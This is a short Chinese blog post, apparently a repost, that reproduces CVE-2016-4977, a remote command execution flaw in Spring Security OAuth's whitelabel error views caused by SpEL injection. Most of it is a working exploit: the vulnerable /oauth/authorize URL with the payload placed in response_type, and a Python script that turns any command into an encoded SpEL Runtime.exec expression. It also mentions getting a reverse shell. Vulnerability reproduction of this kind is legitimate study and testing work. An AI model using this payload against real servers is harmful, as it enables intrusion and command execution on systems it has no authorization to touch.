标签:lang OAuth2 java Spring 复现 message 4977 poc
一、漏洞概述
Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。
二、漏洞复现
发现页面如下:
poc如下:
http://your-ip:8080/oauth/authorize?response_type=[POC]&client_id=acme&scope=openid&redirect_uri=http://test
利用dnslog进行反弹shell
在以下网站进行编码操作:
java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)
exp代码如下,开始执行exp
#!/usr/bin/env python
message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)
放在poc里面执行
复现成功!
标签:lang,OAuth2,java,Spring,复现,message,4977,poc 来源: https://blog.csdn.net/xiaofengdada/article/details/122515955
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。